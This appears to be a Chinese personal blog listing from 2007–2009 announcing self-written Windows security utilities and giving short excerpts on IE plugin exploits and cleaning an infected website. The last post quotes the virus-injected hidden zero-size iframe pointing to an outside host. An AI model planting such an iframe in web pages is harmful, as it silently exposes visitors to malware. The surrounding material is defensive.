|
[ 2009-11-16 13:32:01 | 作者: dklkt ]
自己写的文件夹差异比较工具。早就想写这样一个工具了,这个周末花了点时间简单写了个。界面如下图:
用法很简单,首先选择一个目录,生成快照。一段时间使用之后,再对这个目录生成快照。然后比较这两个快照,就可以知道哪些文件修改了,哪些文件增加了。
应用主要有以下两个方面,一是定期扫描系统敏感目录如c:\windows\system32生成快照,看看有没有什么文件变化。二是网站主定期扫描自己的www目录,这样,人家在你的网站留webshell或者一句话木马就可以轻易发现。
本软件的实现方法也很简单,就是在扫描时,计算目录下所有文件的MD5值,然后存入数据库。比较两个快照就是从数据库中比较数据的变化,几条select语句就可以搞定。
希望大家喜欢!
点击下载
用法很简单,首先选择一个目录,生成快照。一段时间使用之后,再对这个目录生成快照。然后比较这两个快照,就可以知道哪些文件修改了,哪些文件增加了。
应用主要有以下两个方面,一是定期扫描系统敏感目录如c:\windows\system32生成快照,看看有没有什么文件变化。二是网站主定期扫描自己的www目录,这样,人家在你的网站留webshell或者一句话木马就可以轻易发现。
本软件的实现方法也很简单,就是在扫描时,计算目录下所有文件的MD5值,然后存入数据库。比较两个快照就是从数据库中比较数据的变化,几条select语句就可以搞定。
希望大家喜欢!
点击下载
|
[ 2008-08-18 21:48:24 | 作者: dklkt ]
写这个主要是上篇文章中提到的winrar加密。于是研究了它的算法,我自己也写了个利用AES加密的小程序。为了方便使用,所以我写成console模式的。
以下是帮助界面:...
阅读全文…
以下是帮助界面:
引用
====================================================
File Encrypt Tool V1.0 Written by dklkt.
====================================================
Usage:
Filecrypt <Options> <Password> <FilePath> [<outFilePath>]
Options: -e Encrypt File.
-d Decrypt File.
File Encrypt Tool V1.0 Written by dklkt.
====================================================
Usage:
Filecrypt <Options> <Password> <FilePath> [<outFilePath>]
Options: -e Encrypt File.
-d Decrypt File.
阅读全文…
|
[ 2008-07-30 21:56:55 | 作者: dklkt ]
花了一个多星期,总算可以告一段落了~
大家从标题栏就可以大概看出是干什么的吧。一个在线教学工具。就是象以前中学上计算机课的时候,老师用一个软件,把同学们的屏幕都弄得跟老师的一样,这样,老师就可以在他的机子上给大家演示一些东西啦。
马上东南网安有会有一批新的成员加入我们的团队中来,为了给他们创造良好的培训条件。所以受下任会长所托,我写出了这个工具。主要的用途就是拉一批人到学校机房去,然后一个人开服务端,其它同学用客户端连上,搞在线实例教学^_^
写这个工具收获不少,下面简单说说我印象深刻的一些地方吧。呵呵。
首先,最开始考虑的问题就是选择哪种屏幕传输算法。因为考虑到会有很多客户端连接,为了更好的组织客户端,而且为了尽可能...
阅读全文…
|
[ 2008-07-13 20:32:55 | 作者: dklkt ]
模仿unlocker而写。
技术上没有什么创新,主要是参考了cbns888的《在Ring3上实现文件碎甲(解锁)功能》一文。原文链接为http://www.xfocus.net/articles/200708/935.html
另外,感谢邪恶八进制的风泽写的程序dhfile.exe和nevergone的逆向代码。代码基本上是用他们的,我只是做了个界面而已。方便使用。
希望大家喜欢~
点击下载
程序没有进行过多测试,如果有bug请告诉我^_^
技术上没有什么创新,主要是参考了cbns888的《在Ring3上实现文件碎甲(解锁)功能》一文。原文链接为http://www.xfocus.net/articles/200708/935.html
另外,感谢邪恶八进制的风泽写的程序dhfile.exe和nevergone的逆向代码。代码基本上是用他们的,我只是做了个界面而已。方便使用。
希望大家喜欢~
点击下载程序没有进行过多测试,如果有bug请告诉我^_^
|
[ 2007-11-02 10:22:38 | 作者: dklkt ]
直接解压到桌面即可使用,小巧,方便,绿色,监视时几乎不占系统资源。。。。。
v2.0 改进了对带参数运行的病毒的监测。同时优化了查毒速度和自动打开的时间。欢迎大家试用并提出宝贵意见!
v2.1 增加自动打开U盘时的容错功能,没有延时直接打开。
增加只运行一个实例的功能。
改用VS2005编译。
v2.11 因为存在发布问题,重新改用VC6编译。
点击下载
v2.0 改进了对带参数运行的病毒的监测。同时优化了查毒速度和自动打开的时间。欢迎大家试用并提出宝贵意见!
v2.1 增加自动打开U盘时的容错功能,没有延时直接打开。
增加只运行一个实例的功能。
改用VS2005编译。
v2.11 因为存在发布问题,重新改用VC6编译。
点击下载
|
[ 2007-10-25 22:17:23 | 作者: dklkt ]
DropMyRights是微软写的一个能方便的以低权限运行程序的工具。用低权限运行程序,可以有效防止程序中对系统有害的代码。可惜这个工具是命令行版,使用起来有些不方便。
因为上次网安的讲座提到了它,所以我今天晚上花了点时间,把它写成了图形版,功能上没有变化,只是更方便使用。
希望大家喜欢~ ^_^
点击下载
因为上次网安的讲座提到了它,所以我今天晚上花了点时间,把它写成了图形版,功能上没有变化,只是更方便使用。
希望大家喜欢~ ^_^
点击下载
|
[ 2007-09-26 20:20:35 | 作者: dklkt ]
作者: 单克隆抗体
如需转载,请注明作者及来源 http://www.dklkt.cn/
我们知道,因为全球使用ie浏览器的人不在少数,因此,黑客们一直把目光放在ie浏览器的漏洞上。像MS06014、MS07004和ANI漏洞都属于此列。 利用这些漏洞,黑客们只需精心构造特定的网页。然后在任何网站挂上它们,那么只要没有打补丁的用户用ie浏览该网站都有中毒的危险。
不过通常不是中毒,而是中像“灰鸽子”一样的反弹木马以便黑客控制。
为了解决这个问题,不用ie为内核的浏览器是一个办法。但对于我这样的懒人来说,还是ie用的方便快速。firefox感觉有点慢。
不过有人会说,我把微软的补丁都打上不就ok了吗?话不能这么说,打上当然是对的。但是现在ie的漏洞越来越难发现,黑客的目光已经转移到了他们使用的插件了,像QQ ...
阅读全文…
如需转载,请注明作者及来源 http://www.dklkt.cn/
我们知道,因为全球使用ie浏览器的人不在少数,因此,黑客们一直把目光放在ie浏览器的漏洞上。像MS06014、MS07004和ANI漏洞都属于此列。 利用这些漏洞,黑客们只需精心构造特定的网页。然后在任何网站挂上它们,那么只要没有打补丁的用户用ie浏览该网站都有中毒的危险。
不过通常不是中毒,而是中像“灰鸽子”一样的反弹木马以便黑客控制。
为了解决这个问题,不用ie为内核的浏览器是一个办法。但对于我这样的懒人来说,还是ie用的方便快速。firefox感觉有点慢。
不过有人会说,我把微软的补丁都打上不就ok了吗?话不能这么说,打上当然是对的。但是现在ie的漏洞越来越难发现,黑客的目光已经转移到了他们使用的插件了,像QQ ...
阅读全文…
|
[ 2007-07-31 15:07:27 | 作者: dklkt ]
病毒把网站上每个asp/aspx/htm/html/js/txt文件最后都加上了<iframe src=http://xxx.18dmm.com/newdm/new05.htm?075 width=0 height=0></iframe>网站上有几千个文件,一个一个清还不把我累死啦。不行,得写程序了。
本想操起c++就开始搞的,突然发现网站服务器又不是自己家的,花银子买的空间。怎么会让我运行exe程序。看来得用asp了,没办法asp实在太菜,先去网上找找再说。每次碰到问题,我总是这样想的:既然这个问题我碰到了,而它又不是个很生僻的问题,别人肯定也碰到过。嘿嘿。于是google了半天。。。
发现下载下来的几个程序都不很理想,要不是操作太麻烦,就是清除后网站就不能正常运行了。唉~搞了好久,发现别人的东西还是用得不爽。干脆吸取各个优点,把它们改进了下。嘿嘿。不敢独享,特拿出来希望对同被此问题困扰的站长有点作用。
...
阅读全文…
本想操起c++就开始搞的,突然发现网站服务器又不是自己家的,花银子买的空间。怎么会让我运行exe程序。看来得用asp了,没办法asp实在太菜,先去网上找找再说。每次碰到问题,我总是这样想的:既然这个问题我碰到了,而它又不是个很生僻的问题,别人肯定也碰到过。嘿嘿。于是google了半天。。。
发现下载下来的几个程序都不很理想,要不是操作太麻烦,就是清除后网站就不能正常运行了。唉~搞了好久,发现别人的东西还是用得不爽。干脆吸取各个优点,把它们改进了下。嘿嘿。不敢独享,特拿出来希望对同被此问题困扰的站长有点作用。
...
阅读全文…
